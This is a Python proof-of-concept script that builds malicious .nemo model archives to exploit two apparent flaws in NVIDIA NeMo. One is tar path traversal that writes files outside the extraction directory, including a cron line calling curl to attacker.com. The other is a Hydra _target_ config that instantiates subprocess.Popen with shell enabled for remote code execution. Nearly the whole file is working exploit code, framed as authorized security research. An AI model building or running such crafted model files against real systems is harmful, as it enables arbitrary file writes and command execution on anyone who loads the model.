File size: 6,940 Bytes
20db0ae
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
"""

PoC: NeMo Path Traversal + Hydra _target_ Injection

=====================================================

Crafts malicious .nemo files demonstrating two vulnerabilities:



1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()

2. Hydra Injection: _target_ field in config instantiates arbitrary classes



Usage:

    python craft_malicious_nemo.py                     # Generate both PoCs

    python craft_malicious_nemo.py --type traversal    # Path traversal only

    python craft_malicious_nemo.py --type hydra        # Hydra injection only

    python craft_malicious_nemo.py --verify            # Show archive contents



This is for authorized security research only.

"""

import tarfile
import io
import os
import argparse


def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
    """

    Create a .nemo file with path traversal in tar entry names.



    When model_utils.load_config() or save_artifacts() processes this file,

    tar.extract() writes files outside the intended directory because

    _safe_extract() is NOT used in model_utils.py (only in save_restore_connector.py).

    """

    with tarfile.open(output_path, "w:") as tar:
        # 1. Legitimate model_config.yaml (required for detect_prefix())
        config_content = b"""model:

  name: poc_path_traversal

  target: nemo_test

  class_path: nemo.collections.asr.models.EncDecCTCModel

"""
        config_info = tarfile.TarInfo(name="model_config.yaml")
        config_info.size = len(config_content)
        tar.addfile(config_info, io.BytesIO(config_content))

        # 2. Path traversal entry — escapes extraction directory
        # When load_config calls tar.extract(f"{prefix}{MODEL_CONFIG}", path=tmp)
        # the prefix from detect_prefix() is "", so it extracts "model_config.yaml"
        # But save_artifacts extracts arbitrary artifact paths from the tar,
        # and a crafted artifact path can escape.
        payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"

        # Traversal via artifact name
        traversal_info = tarfile.TarInfo(name="../../../../tmp/nemo_poc_escaped.txt")
        traversal_info.size = len(payload)
        tar.addfile(traversal_info, io.BytesIO(payload))

        # Additional traversal — overwrite a more dangerous location
        payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"
        traversal_info2 = tarfile.TarInfo(name="../../../../tmp/nemo_poc_cron")
        traversal_info2.size = len(payload2)
        tar.addfile(traversal_info2, io.BytesIO(payload2))

    file_size = os.path.getsize(output_path)
    print(f"[+] Path traversal .nemo written to: {output_path}")
    print(f"    Size: {file_size} bytes")
    print()
    print("    Tar contents:")
    with tarfile.open(output_path, "r:") as tar:
        for member in tar.getmembers():
            escape = " <-- PATH TRAVERSAL" if ".." in member.name else ""
            print(f"      {member.name}{escape}")
    print()
    print("[!] When loaded by nemo.utils.model_utils.load_config():")
    print("    tar.extract() has NO path validation (_safe_extract not used)")
    print("    Files are written outside the temp extraction directory")
    return output_path


def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
    """

    Create a .nemo file with Hydra _target_ injection in config.



    When setup_optimization() processes this config, it calls

    hydra.utils.instantiate() with the attacker-controlled _target_,

    which can point to subprocess.Popen or any importable class.

    """

    # Config with malicious _target_ pointing to subprocess.Popen
    config_content = b"""model:

  name: poc_hydra_injection

  target: nemo_test

  optim:

    _target_: subprocess.Popen

    args:

      - "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"

    shell: true

  sched:

    name: CosineAnnealing

    warmup_steps: 100

"""

    with tarfile.open(output_path, "w:") as tar:
        config_info = tarfile.TarInfo(name="model_config.yaml")
        config_info.size = len(config_content)
        tar.addfile(config_info, io.BytesIO(config_content))

        # Add a dummy weights file to look like a real .nemo
        weights = b"\x00" * 64
        weights_info = tarfile.TarInfo(name="model_weights.ckpt")
        weights_info.size = len(weights)
        tar.addfile(weights_info, io.BytesIO(weights))

    file_size = os.path.getsize(output_path)
    print(f"[+] Hydra injection .nemo written to: {output_path}")
    print(f"    Size: {file_size} bytes")
    print()
    print("    Tar contents:")
    with tarfile.open(output_path, "r:") as tar:
        for member in tar.getmembers():
            print(f"      {member.name}")
    print()
    print("    Malicious config excerpt:")
    print("      optim:")
    print("        _target_: subprocess.Popen    <-- ARBITRARY CLASS INSTANTIATION")
    print('        args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]')
    print("        shell: true")
    print()
    print("[!] When loaded by NeMo and setup_optimization() is called:")
    print("    hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})")
    print("    -> Instantiates subprocess.Popen with attacker args -> RCE")
    return output_path


def main():
    parser = argparse.ArgumentParser(description="NeMo PoC generator")
    parser.add_argument("--type", choices=["traversal", "hydra", "both"],
                       default="both", help="Which PoC to generate")
    parser.add_argument("--verify", action="store_true",
                       help="Show archive contents after generation")
    parser.add_argument("--output-dir", default=".", help="Output directory")
    args = parser.parse_args()

    paths = []

    if args.type in ("traversal", "both"):
        path = craft_path_traversal_nemo(
            os.path.join(args.output_dir, "path_traversal.nemo"))
        paths.append(path)
        print()

    if args.type in ("hydra", "both"):
        path = craft_hydra_injection_nemo(
            os.path.join(args.output_dir, "hydra_injection.nemo"))
        paths.append(path)
        print()

    if args.verify:
        for path in paths:
            print(f"=== Verifying {path} ===")
            with tarfile.open(path, "r:") as tar:
                for member in tar.getmembers():
                    print(f"  {member.name} ({member.size} bytes)")
                    if member.name == "model_config.yaml":
                        f = tar.extractfile(member)
                        if f:
                            print(f"  Config preview:")
                            for line in f.read().decode().split("\n")[:10]:
                                print(f"    {line}")
            print()


if __name__ == "__main__":
    main()